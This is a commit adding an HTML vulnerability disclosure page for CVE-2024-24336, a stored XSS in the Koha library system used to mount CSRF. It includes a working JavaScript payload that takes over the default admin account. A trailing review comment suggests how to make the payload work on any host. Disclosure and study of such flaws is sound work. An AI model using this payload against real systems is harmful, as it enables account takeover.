commit 1e7e7ff: 9 changed files with 726 additions and 0 deletions.
@@ -0,0 +1,178 @@ | ||
<!DOCTYPE html> | ||
<html lang="en"> | ||
<head> | ||
<meta charset="UTF-8"> | ||
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | ||
<link rel="stylesheet" href="styles.css"> | ||
<title>CVE-2024-24336</title> | ||
</head> | ||
<body> | ||
<div class="green snipcss-3NIWg"> | ||
<div class="container center headings--one-size"> | ||
<header class="header"> | ||
<div class="header__inner"> | ||
<div class="header__logo"> | ||
<a href="#"> | ||
<div class="logo"> | ||
Quantiano | ||
</div> | ||
</a> | ||
</div> | ||
<ul class="menu menu--mobile"> | ||
<li> | ||
<ul class="menu__dropdown"> | ||
<li> | ||
</li> | ||
<li> | ||
</li> | ||
</ul> | ||
</li> | ||
</ul> | ||
</div> | ||
<nav class="navigation-menu"> | ||
<ul class="navigation-menu__inner menu--desktop"> | ||
</ul> | ||
</nav> | ||
</header> | ||
<div class="content"> | ||
<article class="post"> | ||
<h1 class="post-title"> | ||
<a href="#"> | ||
CVE-2024-24336 | ||
</a> | ||
</h1> | ||
<div class="post-meta"> | ||
<time class="post-date"> | ||
2024-02-06 | ||
</time> | ||
<span class="post-author"> | ||
Nitipoom Jaroonchaipipat | ||
</span> | ||
</div><br> | ||
<hr> | ||
<div class="post-content"> | ||
<div> | ||
<h2 id="#"> | ||
Product detail | ||
<a href="#" class="hanchor" arialabel="Anchor"> | ||
⌗ | ||
</a> | ||
</h2> | ||
<ui>Affected product: Koha</ui><br> | ||
<ui>Affected version: 23.05.05.00 (This vulnerability was discovered on November 2023)</ui><br> | ||
<ui>Affected components: '/members/moremember.pl' and ‘/members/members-home.pl’</ui><br><br> | ||
<p class="image-description"> | ||
A multiple Cross-site scripting (XSS) vulnerability in the '/members/moremember.pl', and ‘/members/members-home.pl’ endpoints within Koha Library Management System version <= 23.05.05 allows malicious staff users to carry out CSRF attacks, including unauthorized changes to usernames and passwords of users visiting the affected page, via the 'Circulation note' and ‘Patrons Restriction’ components. | ||
</p> | ||
<hr> | ||
<h2 id="proof-of-concept"> | ||
Prerequisite | ||
<a href="#proof-of-concept" class="hanchor" arialabel="Anchor"> | ||
⌗ | ||
</a> | ||
</h2> | ||
<p > | ||
Install Koha from official Koha Github repository | ||
<a href="https://github.com/Koha-Community/Koha" target="_blank"> | ||
GitHub page | ||
</a><br> | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/0.png"><br> | ||
<p class="image-description">Installed Koha version 23.05.05</p><br> | ||
|
||
<hr> | ||
|
||
<h2 id="proof-of-concept"> | ||
Exploitation | ||
<a href="#proof-of-concept" class="hanchor" arialabel="Anchor"> | ||
⌗ | ||
</a> | ||
</h2> | ||
|
||
<p class="image-description"> | ||
1. We have 2 roles in the system. lead_admin and patrons_staff | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/1.jpg"><br><br> | ||
|
||
<p class="image-description"> | ||
2. Patrons_staff can only staff access into this web portal and add, modify, and view patron only | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/2.jpg"><br><br> | ||
|
||
<p class="image-description"> | ||
3. But patrons_staff with granted won’t be able to edit username for any user except the system admin (same level as default admin by the system) | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/3.jpg"><br><br> | ||
|
||
<p class="image-description"> | ||
4. Try with a simple xss payload on affected field | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/4.jpg"><br><br> | ||
|
||
<p class="image-description"> | ||
4. Try with a simple xss payload on affected field | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/4.jpg"><br><br> | ||
|
||
<p class="image-description"> | ||
5. Change from xss popup message to csrf for impact, since cookie had been set with httponly flag, so we couldn’t steal it. | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/5.jpg"><br><br> | ||
|
||
|
||
<code> | ||
<xmp> | ||
<script>var req = new XMLHttpRequest(); req.open('GET', '/cgi-bin/koha/members/member-password.pl?member=1', true); | ||
req.onreadystatechange = function() { if (req.readyState === 4 && req.status === 200) { | ||
var tokenMatch = req.responseText.match(/<input type="hidden" name="csrf_token" value="([^"]*)"/); | ||
if (tokenMatch) { alert('CSRF Token: ' + tokenMatch[1]); var forgedReq = new XMLHttpRequest(); | ||
forgedReq.open('POST', 'http://127.0.0.1:7002/cgi-bin/koha/members/member-password.pl', true); | ||
forgedReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); | ||
forgedReq.send('destination=&borrowernumber=1&member=1&newuserid=pwned_leadadmin&newpassword=P@ssw0rd&newpassword2=P@ssw0rd&csrf_token=' + | ||
encodeURIComponent(tokenMatch[1])); } } }; req.send();</script> | ||
</xmp> | ||
</code> | ||
|
||
<p class="image-description"> | ||
5. The above javascript code will force user send request along with CSRF token, which we will change username and password for default admin which has a number of 1 | ||
</p><br><br> | ||
|
||
<p class="image-description"> | ||
6. Exploitation in gif shows that malicious staff delivered csrf attack to lead admin successful and changed their username | ||
</p> | ||
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/6.gif"><br><br> | ||
|
||
|
||
|
||
</div> | ||
</div> | ||
</article> | ||
</div> | ||
<footer class="footer"> | ||
<div class="footer__inner"> | ||
<div class="copyright"> | ||
<span> | ||
© 2023 Powered by | ||
<a href="https://gohugo.io"> | ||
Hugo | ||
</a> | ||
</span> | ||
<span> | ||
:: | ||
<a href="https://github.com/panr/hugo-theme-terminal" target="_blank"> | ||
Theme | ||
</a> | ||
made by | ||
<a href="https://github.com/panr" target="_blank"> | ||
panr | ||
</a> | ||
</span> | ||
</div> | ||
</div> | ||
</footer> | ||
</body> | ||
</html> | ||
|
||
|
||
|
||
|
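Review bot: the forged password change in the payload is sent to a hard-coded absolute origin, `forgedReq.open('POST', 'http://127.0.0.1:7002/cgi-bin/koha/members/member-password.pl', true);`, while the token fetch a few lines earlier uses the relative path `/cgi-bin/koha/members/member-password.pl?member=1`; on any staff interface not served from 127.0.0.1:7002 the second request becomes a cross-origin XMLHttpRequest, which the browser sends without the victim's session cookie (no `withCredentials`), so the PoC obtains the token and then silently fails. Use the same relative URL for both requests. Second, the step list is out of order: "4. Try with a simple xss payload on affected field" and its 4.jpg image appear twice, and "5." is used both for the CSRF payload paragraph and for the paragraph explaining the script, so the duplicate block should be dropped and the steps renumbered 1 to 7; step 4 should also name the field the payload was stored in (Circulation note or Patron restriction), since the description lists both but the step only shows a screenshot. Third, the anchors are not unique: `<h2 id="proof-of-concept">` is used for both "Prerequisite" and "Exploitation" and the product-detail heading is `<h2 id="#">`, so every ⌗ link resolves to the same target; give each heading its own id (for example `prerequisite` and `exploitation`) and change `arialabel` to `aria-label`. Finally, `<ui>` is not an HTML element, so the three affected-product lines should be `<ul><li>…</li></ul>`, the obsolete `<xmp>` wrapper should become `<pre><code>` with the script escaped, the quote marks in the component names should be consistent (`'` rather than mixed with `‘ ’`), and "discovered on November 2023" should read "discovered in November 2023".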